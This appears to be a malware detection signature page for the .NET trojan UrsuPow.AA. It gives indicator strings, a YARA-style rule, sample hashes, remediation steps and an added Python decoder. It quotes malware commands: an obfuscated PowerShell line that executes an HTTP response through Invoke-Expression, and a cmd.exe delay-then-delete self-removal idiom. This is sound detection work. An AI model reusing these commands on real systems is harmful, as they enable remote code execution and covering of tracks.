Concrete signature match: Trojan (appears legitimate but performs malicious actions), platform .NET (Microsoft Intermediate Language, MSIL), family Ursu. The rule reproduced below covers the Trojan:MSIL/UrsuPow.AA variant.
Trojan:MSIL/Ursu is a .NET-based trojan that abuses legitimate Windows binaries (LOLBins) such as PowerShell, mshta, rundll32 and regsvr32 for stealthy execution, persistence and API hooking. It establishes command-and-control (C2) communication to download or execute further payloads, uses scheduled tasks and BITS jobs to keep a foothold, and can delete itself after running. In the UrsuPow.AA rule below, both strings must be present: a filler-obfuscated PowerShell one-liner (UTF-16LE bytes that decode to `powershell -windowstyle hidden -command "&{$t='##iex#@(new#-#ob#jec#t N##et#.W#eb#Cl#ie#nt#)...`, i.e. Invoke-Expression over a System.Net.WebClient response once the `#` characters are removed), and the `choice /C Y /N /D Y /T 3 & Del` idiom, a cmd.exe delay-then-delete sequence that implements the self-deletion.
Relevant strings associated with this threat (signature string type in parentheses; the `!#HSTR:...!pli` entries appear to reference other named sub-signatures for the technique rather than literal strings in the binary):
- ijS (SNID)
- 8_9j/5SrIHRTVKaaxOt7oi0PZ/O1H5zK (PEHSTR_EXT)
- m4/u_YT0wH1Kwy8LoT (PEHSTR_EXT)
- vshcso.txe ek-n tevssc (PEHSTR_EXT); a character-shuffled form of "svchost.exe -k netsvcs" (same characters, reordered)
- Service-0x0-3e7$\default (PEHSTR_EXT); 0x3e7 is the logon session ID (LUID) of the Local System account
- AcSvcst.dll (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs (PEHSTR_EXT); the service-group list loaded by svchost.exe -k netsvcs, a common place to register a malicious service DLL
- Final2.dll (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
rule Trojan_MSIL_UrsuPow_AA_2147743060_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "Trojan:MSIL/UrsuPow.AA"
        threat_id = "2147743060"
        type = "Trojan"
        platform = "MSIL: .NET intermediate language scripts"
        family = "UrsuPow"
        severity = "Critical"
        signature_type = "SIGNATURE_TYPE_PEHSTR"
        threshold = "2"
        strings_accuracy = "High"
    strings:
        $x_1_1 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 20 00 2d 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 74 00 79 00 6c 00 65 00 20 00 68 00 69 00 64 00 64 00 65 00 6e 00 20 00 2d 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 22 00 26 00 7b 00 24 00 74 00 3d 00 27 00 23 00 23 00 69 00 65 00 78 00 23 00 40 00 28 00 6e 00 65 00 77 00 23 00 2d 00 23 00 6f 00 62 00 23 00 6a 00 65 00 63 00 23 00 74 00 20 00 4e 00 23 00 23 00 65 00 74 00 23 00 2e 00 57 00 23 00 65 00 62 00 23 00 43 00 6c 00 23 00 69 00 65 00 23 00 6e 00 74 00 23 00 29 00 2e 00 23 00 55 00 70 00 23 00 6c 00 6f 00 61 00 23 00 64 00 23 00 53 00 74 00 23 00 72 00 69 00 23 00 6e 00 67 00 28 00 23 00 27 00 27 00 68 00 23 00 74 00 23 00 74 00 70} //weight: 1, accuracy: High
        $x_1_2 = "choice /C Y /N /D Y /T 3 & Del" wide //weight: 1
    condition:
        (filesize < 20MB) and
        (all of ($x*))
}

SHA-256 hashes listed with this signature:
- a252554acce04f9e83eaca3827a649fe1922195437e12ec439b9a078bf89be45
- 331a5609b90c1187e31b47a321c8f954640cf2179c8b9edf17066a1ef4902798

Remediation: Immediately isolate the affected system, run a full antimalware scan, and remove all detected components. Then check for and dismantle persistence mechanisms: scheduled tasks, BITS jobs, services and service DLLs registered under the Svchost\netsvcs group, and other registry modifications. Review network logs for C2 activity, harden the system configuration, and apply all pending security patches.
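Worked example, added here and not part of the original signature page or the threatcheck.sh rule: it decodes $x_1_1 from its UTF-16LE byte pattern, strips the `#` filler to show the command the sample actually runs, and applies the same two indicators to a few constructed command lines. The sample command lines, the tag names and the heuristic checks in classify() are assumptions made for illustration; the rule itself matches the bytes exactly and carries no deobfuscation logic. The is_shuffled() helper only confirms that the listed "vshcso.txe ek-n tevssc" string is a character permutation of "svchost.exe -k netsvcs".

```python
"""Decode and exercise the two strings in the UrsuPow.AA rule above.

Added example, not code from the original signature page. The hex of $x_1_1
and the text of $x_1_2 are copied from the rule; the sample command lines and
the heuristics in classify() are constructed for illustration.
"""
import re

# $x_1_1 copied from the rule: UTF-16LE ("wide") bytes of an obfuscated PowerShell line.
X_1_1_HEX = (
    "70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 20 00 "
    "2d 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 74 00 79 00 6c 00 65 00 20 00 "
    "68 00 69 00 64 00 64 00 65 00 6e 00 20 00 "
    "2d 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 "
    "22 00 26 00 7b 00 24 00 74 00 3d 00 27 00 "
    "23 00 23 00 69 00 65 00 78 00 23 00 40 00 28 00 "
    "6e 00 65 00 77 00 23 00 2d 00 23 00 6f 00 62 00 23 00 6a 00 65 00 63 00 23 00 74 00 20 00 "
    "4e 00 23 00 23 00 65 00 74 00 23 00 2e 00 57 00 23 00 65 00 62 00 23 00 "
    "43 00 6c 00 23 00 69 00 65 00 23 00 6e 00 74 00 23 00 29 00 2e 00 "
    "23 00 55 00 70 00 23 00 6c 00 6f 00 61 00 23 00 64 00 23 00 53 00 74 00 23 00 "
    "72 00 69 00 23 00 6e 00 67 00 28 00 "
    "23 00 27 00 27 00 68 00 23 00 74 00 23 00 74 00 70"
)
# $x_1_2 copied from the rule (declared "wide", i.e. UTF-16LE in the binary).
X_1_2 = "choice /C Y /N /D Y /T 3 & Del"

FILLER = "#"  # the character the sample sprinkles through its one-liner


def decode_x_1_1(hex_pattern: str = X_1_1_HEX) -> str:
    """Turn the rule's byte pattern back into the text it matches."""
    raw = bytes.fromhex(hex_pattern)
    # The pattern stops after the low byte of the final 'p' (241 bytes, odd).
    # Pad the missing high byte so the last UTF-16 code unit decodes.
    if len(raw) % 2:
        raw += b"\x00"
    return raw.decode("utf-16-le")


def strip_filler(text: str, filler: str = FILLER) -> str:
    """Undo the simplest layer of the obfuscation: delete the filler character."""
    return text.replace(filler, "")


# Matches the cmd.exe delay-then-delete idiom of $x_1_2 with any /T value (assumed
# generalisation; the rule itself is fixed to "/T 3").
SELF_DELETE_RE = re.compile(
    r"choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*del\b", re.IGNORECASE
)


def classify(cmdline: str) -> set:
    """Tag a command line with the behaviours the two rule strings describe.

    Heuristics for illustration only; not the rule's byte-exact matching.
    """
    tags = set()
    # Normalise the way the sample's own deobfuscation must: drop filler, lowercase.
    norm = strip_filler(cmdline).lower()
    if ("powershell" in norm and "net.webclient" in norm
            and ("uploadstring" in norm or "downloadstring" in norm)
            and ("iex" in norm or "invoke-expression" in norm)):
        tags.add("powershell-webclient-exec")
    if SELF_DELETE_RE.search(cmdline):
        tags.add("choice-del-self-delete")
    # A PowerShell line carrying many filler characters is itself suspicious.
    if "powershell" in norm and cmdline.count(FILLER) >= 5:
        tags.add("filler-obfuscated")
    return tags


def is_shuffled(candidate: str, original: str) -> bool:
    """True if candidate is a character permutation of original (same multiset)."""
    return sorted(candidate) == sorted(original)


# Constructed sample command lines (not from the page); the first is the decoded rule prefix.
SAMPLES = {
    "sig_prefix": decode_x_1_1(),
    "self_delete": r'cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Public\stage1.exe"',
    "benign_ps": "powershell -Command Get-Process",
    "benign_choice": 'choice /C YN /M "Continue?"',
}

if __name__ == "__main__":
    print(decode_x_1_1())
    print(strip_filler(decode_x_1_1()))
    for name, line in SAMPLES.items():
        print(f"{name}: {sorted(classify(line))}")
    print(is_shuffled("vshcso.txe ek-n tevssc", "svchost.exe -k netsvcs"))
```

After strip_filler() the decoded line ends in `$t='iex@(new-object Net.WebClient).UploadString(''http`: the string returned by an HTTP request made through WebClient.UploadString is handed to Invoke-Expression. The `@` most likely stands for whitespace that a later replace step restores (an inference; the pattern ends before any such step), and the doubled single quote is PowerShell's escape for a quote inside the single-quoted `$t` literal. Because the rule requires both strings, a sample that only carries the `choice ... & Del` self-delete idiom will not trip it, which is why classify() reports the two indicators separately.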